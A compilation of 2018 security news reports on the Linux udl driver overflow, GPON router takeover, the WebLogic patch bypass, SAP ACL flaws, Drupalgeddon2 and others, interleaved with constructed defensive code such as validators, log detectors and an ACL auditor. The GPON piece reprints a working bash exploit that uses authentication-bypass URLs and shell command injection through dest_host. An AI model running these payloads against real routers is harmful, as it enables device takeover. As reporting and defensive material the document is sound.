The prototype of the mmap() function from user-space confirms the presence of numerous fields that could be used by the attacker to potentially trigger the vulnerabilities.


According to the experts, developers should perform at least the following checks to avoid possible Integer-Overflows:

Region start: 0 <= offset < buffer’s end
Region end: buffer’s start <= offset + length <= buffer’s end
Region start <= Region End
“In actual fact, the last check can be spared since the Linux kernel will sanitize the supplied length, making it practically impossible to pass the first two checks while still passing the third check,” continues Check Point.

The experts discovered the CVE-2018-8781 vulnerability while analyzing a function that maps physical memory pages to the user, remap_pfn_range().

The experts searched for all the modules using the remap_pfn_range function (a grep for “remap_pfn_range”) and obtained 158 results; after filtering for drivers, the list was narrowed to six possible candidates.

“The video/drm module in the kernel defines a default mmap() wrapper that calls that real mmap() handler defined by the specific driver. In our case the vulnerability is in the internal mmap() defined in the fb_helper file operations of the “udl” driver of “DisplayLink”.” the researchers discovered.

In this way, the researchers spotted an Integer-Overflow in the driver.

“This is a classic example for an Integer-Overflow. Since offset is unsigned the programmer skipped check #1 and went directly to check #2. However, the calculation “offset + size” could wrap-around to a low value, allowing us to bypass the check while still using an illegal “offset” value.” continues Check Point.

“on 64 bit machines there are only 48 bits of accessible memory, meaning that if we use a huge “offset” to bypass this check we will also have to make sure that “info->fix.smem_start + offset” will wrap-around to a valid mapable physical address.”

The experts verified the flaw on an Ubuntu 64-bit virtual machine using a simulated vulnerable driver. The driver’s mmap() handler contained the implementation to check in each test performed by the researchers.

The user-mode code performed 2 consecutive calls to mmap() on the vulnerable driver:

length = 0x1000, offset = 0x0 -> sanity check
length = 0x1000, offset = 0xFFFFFFFFFFFFFFFF - 0x1000 + 1 -> vulnerability check
With the buffer’s address set at the page-aligned physical address of the kernel’s /dev/urandom implementation, the results were the expected ones.
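The range checks and the wrap-around described above, as an added example that is not Check Point's code or the udl driver's: a simulated driver's bounds check in the wrap-prone form next to the hardened form, run against the two mmap() calls listed above. The buffer size and smem_start value are constructed, and the function names are assumptions.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the driver's shared buffer: 16 pages starting at a
 * made-up physical address (a real driver reads these from info->fix). */
#define PAGE_SZ     UINT64_C(0x1000)
#define BUF_SIZE    (16 * PAGE_SZ)
#define SMEM_START  UINT64_C(0x7FFF0000)

/* Wrap-prone check, mirroring the bug described above: offset is unsigned, so
 * check #1 (0 <= offset < buffer end) was skipped and only check #2 remains.
 * The sum is 64-bit unsigned arithmetic, so a huge offset makes "offset + size"
 * wrap to a small value that passes. */
bool range_check_vulnerable(uint64_t offset, uint64_t size)
{
    uint64_t end = offset + size;       /* can wrap around to 0 */
    return end <= BUF_SIZE;             /* check #2 only */
}

/* Hardened check: test the start of the region first, then phrase the end test
 * as a subtraction that cannot wrap. Check #3 (start <= end) is then implied. */
bool range_check_safe(uint64_t offset, uint64_t size)
{
    if (offset >= BUF_SIZE)             /* check #1: 0 <= offset < buffer end */
        return false;
    if (size > BUF_SIZE - offset)       /* check #2 without an overflow */
        return false;
    return true;
}

/* Physical address the vulnerable path would hand to remap_pfn_range():
 * smem_start + offset wraps the same way and, for the offset used in the
 * vulnerability check, lands on the page just before the buffer. */
uint64_t mapped_phys_addr(uint64_t offset)
{
    return SMEM_START + offset;
}

int main(void)
{
    /* The two calls from the write-up: the sanity check and the overflow case. */
    const uint64_t len = PAGE_SZ;
    const uint64_t offsets[2] = { 0x0, UINT64_MAX - PAGE_SZ + 1 };

    for (int i = 0; i < 2; i++) {
        uint64_t off = offsets[i];
        printf("offset=0x%016" PRIx64 " size=0x%" PRIx64 "\n", off, len);
        printf("  vulnerable check: %s\n",
               range_check_vulnerable(off, len) ? "accepted" : "rejected");
        printf("  hardened check:   %s\n",
               range_check_safe(off, len) ? "accepted" : "rejected");
        printf("  would map phys:   0x%016" PRIx64 "\n", mapped_phys_addr(off));
    }
    return 0;
}
```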

Additional checks revealed that it is possible for the user to read and write from/to the mapped pages. Thus, an attacker could eventually trigger code execution in kernel space, the researchers explain.

“While the vulnerability was found using a simple search, it was introduced to the kernel eight years ago. This fact can teach us that even on a popular open source project as the Linux Kernel, you could always hope to find vulnerabilities if you know where to search.” concluded Check Point.


Critical RCE vulnerability found in over a million GPON Home Routers
1.5.2018 securityaffairs
Vulnerebility

Security researchers at VPNMentor conducted a comprehensive assessment of a number of GPON home routers and discovered a critical remote code execution vulnerability that could be exploited to gain full control over them.
The researchers have found a way to bypass the authentication to access the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass flaw with another command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack

Exploitation:
Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could be chained to allow complete control of the vulnerable device and therefore the network. The first vulnerability lies in the authentication mechanism of the device and could be exploited by an attacker to bypass all authentication.

The vulnerability affects the built-in HTTP server, which checks for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending ?images/ to the URL, the attacker can bypass authentication on the endpoint. This works on both HTML pages and GponForm/ endpoints.

For instance, by requesting

/menu.html?images/

or

/GponForm/diag_FORM?images/

the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected using the host parameter.

“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.

The experts included the following bash version of the exploit code:

#!/bin/bash

echo "[+] Sending the Command... "

“We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post:

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON is a very popular type of passive optical network device that uses fiber optics; these devices are provided by ISPs. In the video, you can see that over one million people use this type of network router.

Below is the video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.
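The two weaknesses described above, as an added example that is not vpnMentor's or the vendor's code: the substring-style authentication check beside a path-only check that ignores the query string, a strict validator for the ping/traceroute target, and a log rule that flags the "?images/" signature on non-image paths. The "/images/" public prefix and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Path prefix the firmware treats as public static content. The real
# firmware's list is not on the page; '/images/' is assumed from the bypass.
PUBLIC_PREFIXES = ("/images/",)


def needs_auth_broken(request_target: str) -> bool:
    """Mimics the flawed check the analysis describes: the server looks for
    the public asset path anywhere in the request target, query string
    included, so '/menu.html?images/' is treated as a public image request."""
    return "images/" not in request_target


def normalize_path(path: str) -> str:
    """Resolve '.', '..' and empty segments before any prefix comparison."""
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    norm = "/" + "/".join(parts)
    if path.endswith("/") and parts:
        norm += "/"
    return norm


def needs_auth_fixed(request_target: str) -> bool:
    """Hardened check: authorise on the normalised path only; the query
    string never influences the decision."""
    path = normalize_path(urlsplit(request_target).path)
    return not path.startswith(PUBLIC_PREFIXES)


# A ping/traceroute target must be a hostname or IPv4 literal: letters,
# digits, hyphens and dots only. Backticks, ';', '|', spaces and similar
# shell metacharacters never pass, so nothing reaches a shell unchecked.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def valid_ping_target(host: str) -> bool:
    return bool(HOST_RE.match(host))


# Common-log-format style lines, constructed for this example.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/May/2018:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/May/2018:10:00:05 +0000] "GET /menu.html?images/ HTTP/1.1" 200 3120',
    '198.51.100.7 - - [01/May/2018:10:00:06 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 88',
    '192.0.2.11 - - [01/May/2018:10:01:00 +0000] "GET /diag.html HTTP/1.1" 401 0',
]
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_bypass_attempts(log_lines):
    """Return request targets whose query string carries the public asset
    path while the real path is not public: the signature of this bypass."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        if "images/" in parts.query and not normalize_path(parts.path).startswith(PUBLIC_PREFIXES):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for t in ("/menu.html?images/", "/images/logo.png", "/images/../diag.html"):
        print(t, "broken:", needs_auth_broken(t), "fixed:", needs_auth_fixed(t))
    print(flag_bypass_attempts(SAMPLE_LOG))
```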

Recommendations:
Check if your router uses the GPON network.
Be aware that GPON routers can be hacked and exploited.
Talk to your ISP to see what they can do to fix the bug.


Oracle botches CVE-2018-2628 patch and hackers promptly start scanning for vulnerable WebLogic installs
30.4.2018 securityaffairs
Vulnerebility

According to a security expert, Oracle appears to have botched the CVE-2018-2628 fix, which means that attackers could bypass it to take over WebLogic servers.
Earlier in April, Oracle patched the critical CVE-2018-2628 vulnerability in Oracle WebLogic Server, but Alibaba security researcher @pyn3rd discovered that the proposed fix could be bypassed.

pyn3rd
@pyn3rd
#CVE-2018-2628 Weblogic Server Deserialization Remote Command Execution. Unfortunately the Critical Patch Update of 2018.4 can be bypassed easily.

8:24 AM - Apr 28, 2018
The CVE-2018-2628 flaw was addressed in Oracle’s Critical Patch Update (CPU) security advisory; a remote attacker can easily exploit the vulnerability to completely take over an Oracle WebLogic server.

“Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.” reads the description provided by Mitre. “Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts).”
@pyn3rd added that it is quite easy to bypass the patch:

just4pentest
@just4pentest
29 Apr
Replying to @pyn3rd
How to bypass??

pyn3rd
@pyn3rd
there is the difference, just use <java.rmi.activation.Activator> replace <java.rmi.registry.Registry> pic.twitter.com/xeH0Ck86G3

7:30 AM - Apr 29, 2018

The popular cyber security expert Kevin Beaumont explained that the mitigation implemented by Oracle seems to only blacklist commands.

Kevin Beaumont

@GossiTheDog
29 Apr
Oh dear. There’s a zero day in Oracle WebLogic because the April patch didn’t fix the issue properly. Mitigation: make sure port 7001 TCP is blocked inbound to your Fusion stack boxes. https://twitter.com/pyn3rd/status/990114565219344384 …

Kevin Beaumont

@GossiTheDog
This is going to keep being an evergreen tweet. It looks like Oracle isn’t even fixing the issues here, they’re just blacklisting commands. In this case they missed the very next command. https://twitter.com/gossithedog/status/987448846887411712?s=21 …

6:01 PM - Apr 29, 2018
Errors of this kind could have serious consequences for end users: since April 17 (just after Oracle published the quarterly Critical Patch Update (CPU) advisory), experts have observed threat actors scanning the Internet for Oracle WebLogic servers.

After Oracle published the Critical Patch Update, the researcher Xinxi published the technical details of the CVE-2018-2628 vulnerability, and later a user with the moniker ‘Brianwrf’ shared proof-of-concept (PoC) code on GitHub.

The availability of the PoC code caused a spike in scans for port 7001 that runs the vulnerable WebLogic T3 service.

The following graph from the SANS Institute shows the spike in Internet scans for port 7001:

CVE-2018-2628 scans


90% of the SAP customers exposed to hack due to 13 Year-Old configuration flaw
29.4.2018 securityaffairs
Vulnerebility

Many companies using SAP systems are unaware that they are affected by a 13-year-old security configuration issue that could expose their architecture to cyber attacks.
According to the security firm Onapsis, 90 percent of SAP systems were impacted by the vulnerability, which affects SAP Netweaver and can be exploited by a remote unauthenticated attacker who has network access to the system.

Because SAP Netweaver technology is the pillar for SAP solutions, including the SAP ERP and S/4 HANA, at least 378,000 users worldwide are affected.

“How critical is this vulnerability? SAP Netweaver installations, if not properly secured, could be compromised by a remote unauthenticated attacker having only network access to the system.” reads the report published by Onapsis.

“Attackers can obtain unrestricted access to SAP systems, enabling them to compromise the platform along with all of its information, modify or extract this information or shut the system down. It affects all SAP Netweaver versions and still exists within the default security settings on every Netweaver-based SAP product such as the SAP ERP, including the latest versions such as S/4HANA.”

The configuration relates to how components of the SAP infrastructure communicate, with a specific focus on Application Servers, SAP Message Servers, and the SAP Central Instance.

SAP configuration issue

Every time a new app is created, the sysadmin must register the new app (Application Server) with the SAP Message Server; the registration is performed via internal port 39<xx> (3900 by default).

The SAP Message Server implements an access control list (ACL) mechanism for access to the registration port.

“The SAP Message Server implements a protection mechanism, also known as ACL or access control list, to check which IP addresses can register an application server and which ones cannot.” continues the report.

“This ACL is controlled by the profile parameter “ms/acl_info”. This parameter should contain a path to a file with the following format:

HOST=[*| ip-adr | hostname | Subnet-mask | Domin ] [, …]”

SAP published details on how to properly configure this access file in 2005 through SAP Security Note #8218752 ‘security settings in the message server.’

“Nevertheless, this parameter is set with default configuration, as well as the ACL contents open, allowing any host with network access to the SAP Message Server to register an application server in the SAP system.” continues the Onapsis report.

An attacker can exploit an improperly configured Message Server ACL to register a fake Application Server, which could be abused to gain full control of the SAP installation.

The experts highlighted that the issue could be mitigated by properly configuring the SAP Message Server ACL.

Below is the step-by-step remediation provided by Onapsis:

Properly configure SAP Message Server ACL. SAP published instructions for this more than ten years ago, which confirms the need for more investment and education in SAP cybersecurity if this vulnerability is still present in your systems.
Implement continuous monitoring and compliance checks to validate that security-relevant configurations such as the Message Server ACL files do not change the security posture of the entire system.
Implement an SAP cybersecurity program that helps bridge the gap between teams: Align IT Security, Internal Audit, BASIS and SAP Security teams towards the unified goal of running secure SAP applications.


Expert shows how to trigger blue-screen-of-death on Windows by triggering NTFS flaw
28.4.2018 securityaffairs
Vulnerebility

Bitdefender researcher Marius Tivadar has developed a dodgy NTFS file system image that could trigger a blue-screen-of-death when a mount is attempted on Windows 7 and 10 systems.
The Bitdefender expert Marius Tivadar has discovered a vulnerability tied to the way Microsoft handles NTFS filesystem images; he also published proof-of-concept code on GitHub that could be used to cause a Blue Screen of Death within seconds on most Windows computers.

“One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack, can be driven from user mode, limited user account or Administrator. It can even crash the system if it is in locked state.” wrote Tivadar.

The PoC code includes a malformed NTFS image that can be stored on a USB thumb drive. Once the user inserts the USB thumb drive into a Windows PC, the system crashes within a few seconds with a Blue Screen of Death.

Tivadar highlighted that auto-play is activated by default, and even with it disabled the system will crash when the NTFS image is accessed.
The expert noticed that some security tools, such as Windows Defender, scan the USB stick and thereby trigger the flaw.
NTFS hack
Tivadar reported the NTFS issue to Microsoft in July 2017, but the tech giant did not recognize it as a security bug, so the expert opted to disclose the flaw.

Microsoft pointed out that exploitation of the issue requires physical access, but Tivadar explained that an attacker could use malware to deliver the PoC code.

Tivadar noticed that the NTFS bug also works while the PC is locked; this is an anomaly, because there is no need to mount a USB stick/volume when the system is locked.

“Generally speaking, no driver should be loaded, no code should get executed when the system is locked and external peripherals are inserted into the machine.” the researcher explained.

Tivadar published two PoC videos on his personal Google Photos account and on his Google Drive account.


Microsoft Releases More Microcode Patches for Spectre Flaw
27.4.2018 securityweek 
Vulnerebility

Microsoft this week released another round of software and microcode updates designed to address the CPU vulnerability known as Spectre Variant 2.

Microsoft has been releasing software mitigations for the Spectre and Meltdown vulnerabilities since January, shortly after researchers disclosed the flaws.

A new standalone security update (4078407) enables by default the mitigations against Spectre Variant 2 in all supported versions of Windows 10 and Windows Server 2016. Alternatively, advanced users can manually enable these mitigations through registry settings.

The company announced in early March that microcode updates from Intel will be delivered to Windows 10 and Windows Server 2016 users through the Microsoft Update Catalog. The first round of updates covered devices with Intel Skylake processors and the list was later expanded to include Coffee Lake and Kaby Lake CPUs.

Broadwell and Haswell processors have now also been added to the list, which currently includes tens of Intel CPUs across roughly 30 microarchitecture categories. Intel announced the availability of microcode updates for Broadwell and Haswell CPUs in late February.

Meltdown and Spectre allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be resolved with software updates, but Spectre Variant 2 requires microcode patches as well.

Last month, Microsoft released out-of-band updates for Windows 7 and Windows Server 2008 R2 to address a serious privilege escalation vulnerability introduced by the Meltdown mitigations.


13 Year-Old Configuration Flaw Impacts Most SAP Deployments
27.4.2018 securityweek 
Vulnerebility

Most SAP implementations continue to be impacted by a security configuration flaw initially documented in 2005, Onapsis warns.

Neglected security configurations and unintentional configuration drifts of previously secured systems render SAP implementations vulnerable despite the release of several Security Notes designed to address the issues. According to Onapsis, a firm that specializes in securing SAP and Oracle applications, 9 out of 10 SAP systems were found vulnerable to the bug.

The security bug impacts SAP Netweaver and can be exploited by a remote unauthenticated attacker who has network access to the system. By targeting the bug, an attacker could gain unrestricted access to the system, thus being able to compromise the platform and all of the information on it, extract data, or shut the system down.

The vulnerability impacts all SAP Netweaver versions. Because SAP Netweaver is the foundation of all SAP deployments, 378,000 customers worldwide are affected, Onapsis says. The vulnerability exists within the default security settings on every Netweaver-based SAP product. Even the next generation digital business suite S/4HANA is impacted.

In a report detailing the vulnerability, Onapsis explains that an ACL (access control list) protection scheme governs how SAP Application Servers register with the SAP Message Server, which they must do in order to work. Registration is performed using internal port 39<xx> (3900 by default), and SAP explained in a Security Note in 2010 that the port should be secured and only accessible from trusted application server IP addresses.

The Message Server ACL, designed to check “which IP addresses can register an application server and which ones cannot,” is controlled by a profile parameter (ms/acl_info) that should contain a path to a file with a specific format. SAP published details on how to properly configure this access file in a Security Note in 2015.

“Nevertheless, this parameter is set with default configuration, as well as the ACL contents open, allowing any host with network access to the SAP Message Server to register an application server in the SAP system,” Onapsis explains.

By exploiting the lack of a secure Message Server ACL configuration on a SAP System, an attacker can register a fake Application Server, which could then be abused to achieve full system compromise through more complex attacks.

For a successful attack, however, an actor needs to take advantage of this misconfiguration: access to the Message Server internal port with a default configuration in the ACL. This means that proper configuration of SAP Message Server ACL should mitigate the risks associated with the attack.

Organizations are also advised to implement continuous monitoring and compliance checks to ensure relevant configurations don’t affect the security posture of the system, as well as to implement an SAP cybersecurity program that helps bridge the gap between teams.

“While much attention this year will go to new vulnerabilities, such as IoT, Meltdown and Spectre, there is a more silent threat lurking behind the scenes that may be as serious and certainly as broad. Many SAP landscapes are so interconnected and complex that taking a system offline to implement a secure configuration can be very disruptive to the organization. That being said, it is critical that organizations ensure that they make the time to implement the configuration. These upgrades must be planned out and timed to have the lowest impact on the organization,” said JP Perez-Etchegoyen, CTO at Onapsis.
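The ms/acl_info file described in both Onapsis reports above, as an added example that is not Onapsis's or SAP's code: a small auditor that parses the HOST=[* | ip-adr | hostname | Subnet-mask | Domain] [, ...] format quoted in the report, raises the "open ACL" finding the remediation steps ask compliance checks to catch, and answers whether a given host could register. The exact subnet spelling (CIDR or a trailing wildcard octet), '#' comment lines and the two sample files are assumptions constructed for the example.

```python
import ipaddress
import re

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
WILDCARD_NET_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){0,2}\.\*$")  # e.g. 10.1.1.* (assumed spelling)


def parse_acl(text: str) -> list:
    """Return every HOST entry in the file; '#' starts a comment (assumed)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, sep, value = line.partition("=")
        if not sep or key.strip().upper() != "HOST":
            raise ValueError(f"unexpected line in ACL file: {raw!r}")
        entries.extend(e.strip() for e in value.split(",") if e.strip())
    return entries


def classify(entry: str) -> str:
    if entry == "*":
        return "any"
    if IPV4_RE.match(entry):
        return "ip"
    if "/" in entry or WILDCARD_NET_RE.match(entry):
        return "subnet"
    if entry.startswith("*."):
        return "domain"
    return "hostname"


def audit_acl(text: str) -> list:
    """Findings as (code, detail) tuples; an empty list means the file passes."""
    findings = []
    entries = parse_acl(text)
    if not entries:
        # Assumption: with no entries the registration port is effectively
        # unrestricted, so treat it like the open default the report describes.
        findings.append(("EMPTY", "no HOST entries: registration port is not restricted"))
    for e in entries:
        kind = classify(e)
        if kind == "any":
            findings.append(("OPEN", "HOST=* lets any network host register an application server"))
        elif kind == "subnet" and "/" in e:
            net = ipaddress.ip_network(e, strict=False)
            if net.prefixlen < 24:
                findings.append(("BROAD_SUBNET", f"{e} admits {net.num_addresses} addresses"))
        elif kind == "domain":
            findings.append(("DOMAIN_WILDCARD", f"{e} trusts reverse DNS instead of fixed addresses"))
    return findings


def entry_matches(entry: str, client: str) -> bool:
    kind = classify(entry)
    if kind == "any":
        return True
    if kind == "ip":
        return client == entry
    if kind == "subnet":
        if "/" in entry:
            try:
                return ipaddress.ip_address(client) in ipaddress.ip_network(entry, strict=False)
            except ValueError:  # client is a hostname, not an address
                return False
        return client.startswith(entry[:-1])  # "10.1.1.*" -> prefix "10.1.1."
    if kind == "domain":
        return client.lower().endswith(entry[1:].lower())
    return client.lower() == entry.lower()


def may_register(text: str, client: str) -> bool:
    """Would a server at this address or name be allowed to register?"""
    return any(entry_matches(e, client) for e in parse_acl(text))


# Constructed sample files: the open default and a restricted version.
DEFAULT_OPEN = "HOST=*\n"
HARDENED = """# constructed: only the known application servers may register
HOST=10.1.1.10, 10.1.1.11
HOST=10.1.2.0/24
"""

if __name__ == "__main__":
    for name, acl in (("default", DEFAULT_OPEN), ("hardened", HARDENED)):
        print(name, audit_acl(acl), may_register(acl, "203.0.113.9"))
```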


CVE-2018-7602 – Drupal addressed a new vulnerability associated with Drupalgeddon2 flaw
27.4.2018 securityweek 
Vulnerebility

The new flaw tracked as CVE-2018-7602, is a highly critical remote code execution issue, Drupal team fixed it with the release of versions 7.59, 8.4.8 and 8.5.3.
Drupal team has released updates for versions 7 and 8 of the popular content management system (CMS) to address the recently disclosed CVE-2018-7600 Drupalgeddon2 flaw.

“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.” reads the security advisory published by Drupal.

Administrators of websites running the Drupal CMS who cannot immediately update their version can apply a patch, but it only works if the fix for the original Drupalgeddon2 flaw is present. If the previous patch was not installed, the website may already be compromised, Drupal developers warned.

Both CVE-2018-7600 and CVE-2018-7602 have been exploited in the wild.

A week after the release of the security update for the CVE-2018-7600 flaw, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point, along with Drupal experts at Dofinity, analyzed the CMS to understand the Drupalgeddon2 vulnerability and published a technical report on the flaw.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication.” reads the analysis.

“By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

After the publication of the report, the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

The new CVE-2018-7602 vulnerability was discovered while members of the Drupal Security Team with the help of the Drupal developer Jasper Mattsson were analyzing the original Drupalgeddon2 flaw.

Security experts speculate the vulnerability may have been exploited to launch the ransomware-based attack on the website of the Ukrainian energy ministry.

Drupalgeddon2

Unfortunately, several threat actors are exploiting the Drupalgeddon2 flaw in the wild; security experts observed crooks using the exploit to deliver cryptocurrency miners such as XMRig and CGMiner.

According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts, cryptocurrency miners and backdoors.

The experts associated one of the observed campaigns aimed to deliver XMRig with a cybercriminal gang that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.

According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempts to drop cryptocurrency miners on the vulnerable systems.
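The "insufficient input sanitation on Form API AJAX requests" described in the Check Point analysis above, as an added example that is not Drupal's code: Drupal's published fix for SA-CORE-2018-002 added a request sanitizer that strips request keys beginning with '#', the prefix Drupal's render and form arrays reserve for internal properties, so user input can no longer name a property. This is a Python re-implementation of that idea with a simplified PHP-style bracket parameter parser, a log rule built on it, and constructed sample parameters and log lines; the parameter name "#constructed" is a placeholder, not a real Drupal property.

```python
import re
from urllib.parse import parse_qs, urlsplit

PROPERTY_PREFIX = "#"   # Drupal render/form arrays keep internal properties under '#'-keys


def _strip(value, path, stripped):
    if isinstance(value, dict):
        clean = {}
        for key, child in value.items():
            key_path = f"{path}.{key}" if path else str(key)
            if str(key).startswith(PROPERTY_PREFIX):
                stripped.append(key_path)      # user input never names a property
                continue
            clean[key] = _strip(child, key_path, stripped)
        return clean
    if isinstance(value, list):
        return [_strip(v, f"{path}[{i}]", stripped) for i, v in enumerate(value)]
    return value


def sanitize_request(params: dict):
    """Return (cleaned params, dotted paths of the keys that were removed)."""
    stripped = []
    return _strip(params, "", stripped), stripped


def _insert(node: dict, segs, val):
    seg, rest = segs[0], segs[1:]
    if seg == "":
        seg = len(node)                      # PHP auto-indexes 'a[]'
    if not rest:
        node[seg] = val
        return
    child = node.get(seg)
    if not isinstance(child, dict):
        child = node[seg] = {}
    _insert(child, rest, val)


def php_params(query: str) -> dict:
    """Parse 'a[b][c]=v' style parameters into nested dicts the way PHP's
    $_GET/$_POST do (simplified re-implementation, not PHP's own)."""
    root = {}
    for key, values in parse_qs(query, keep_blank_values=True).items():
        m = re.fullmatch(r"([^\[\]]+)((?:\[[^\]]*\])*)", key)
        if not m:
            continue
        segs = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        for val in values:
            _insert(root, segs, val)
    return root


# Constructed access-log lines. Only query strings are visible here, so
# POST bodies need the same check at the application or WAF layer.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Apr/2018:08:00:00 +0000] "GET /node/1?page=2 HTTP/1.1" 200 4096',
    '203.0.113.9 - - [13/Apr/2018:08:00:03 +0000] "POST /node/add?mail%5B%23constructed%5D=x HTTP/1.1" 200 512',
]
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')


def flag_log(lines):
    """Targets whose parameters would have had '#'-keys stripped."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        _, stripped = sanitize_request(php_params(urlsplit(target).query))
        if stripped:
            hits.append((target, stripped))
    return hits


if __name__ == "__main__":
    print(sanitize_request(php_params("form_id=x&mail%5B%23constructed%5D=1&tags%5B%5D=a&tags%5B%5D=b")))
    print(flag_log(SAMPLE_LOG))
```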


Microsoft releases new software and microcode updates to address Spectre flaw (Variant 2).
27.4.2018 securityaffairs
Vulnerebility

Microsoft has released a new batch of software and microcode updates to address the Spectre flaw (Variant 2).
The IT giant has rolled out a new batch of software and microcode security updates to address the Spectre flaw (Variant 2).

Spectre Variant 2, aka CVE-2017-5715, is a branch target injection vulnerability. While Meltdown and Variant 1 of the Spectre attacks can be mitigated efficiently with software updates, Spectre Variant 2 requires microcode updates to be fully addressed.

Microsoft, one of the first companies to release security patches for the Meltdown and Spectre vulnerabilities in Intel chips, has been releasing software mitigations for the Spectre and Meltdown flaws since January.

Now Microsoft issued the security update 4078407 that enables by default the mitigations against Spectre Variant 2 for all Windows 10 and Windows Server 2016 versions.

Microsoft also allows advanced users to manually enable the mitigations through registry settings.

“Applying this update will enable the Spectre Variant 2 mitigation CVE-2017-5715 – ‘Branch target injection vulnerability.’ Advanced users can also manually enable mitigation against Spectre, Variant 2 through the registry settings documented in the following articles:

Windows Client Guidance for IT Pros to protect against speculative execution side-channel vulnerabilities
Windows Server Guidance to protect against speculative execution side-channel vulnerabilities,” reads the security advisory published by Microsoft.

In March, Microsoft released the first set of security updates for Windows systems running on Intel Skylake processors and later the tech giant also covered Coffee Lake and Kaby Lake CPUs.

Microsoft also provided updates for Broadwell and Haswell processors.

In April, Microsoft released out-of-band updates for Windows 7 and Windows Server 2008 R2 to fix a severe privilege escalation flaw introduced by the Meltdown security patches.


Western Digital MY CLOUD EX2 storage devices leak files
26.4.2018 securityaffairs
Vulnerebility

Researchers at Trustwave have discovered that Western Digital My Cloud EX2 storage devices leak files.
Security experts at Trustwave have discovered that Western Digital My Cloud EX2 storage devices leak files on a local network by default. The situation gets worse if users configure the device for remote access and expose it online: in this scenario the My Cloud EX2 storage devices also leak files via an HTTP request on port 9000.

“unfortunately the default configuration of a new My Cloud EX2 drive allows any unauthenticated local network user to grab any files from the device using HTTP requests,” states Trustwave.

According to the experts, the problem is tied to the embedded UPnP media server that is automatically started when the device is powered on.

“By default, unauthenticated users can grab any files from the device completely bypassing any permissions or restrictions set by the owner or administrator,” continues Trustwave.

Trustwave revealed they found the vulnerability on January 26.

Trustwave reported the vulnerabilities to Western Digital that initially downplayed them, and only recommended users to disable the DLNA.


Trustwave published Proof-of-Concept code for the vulnerabilities. In the attack scenario, the attacker issues an HTTP request to port 9000 asking for the “TMSContentDirectory/Control” resource; the UPnP server, in turn, responds with a list of files on the storage. The attacker then uses subsequent HTTP requests to fetch files from the storage using URLs from the collected response.

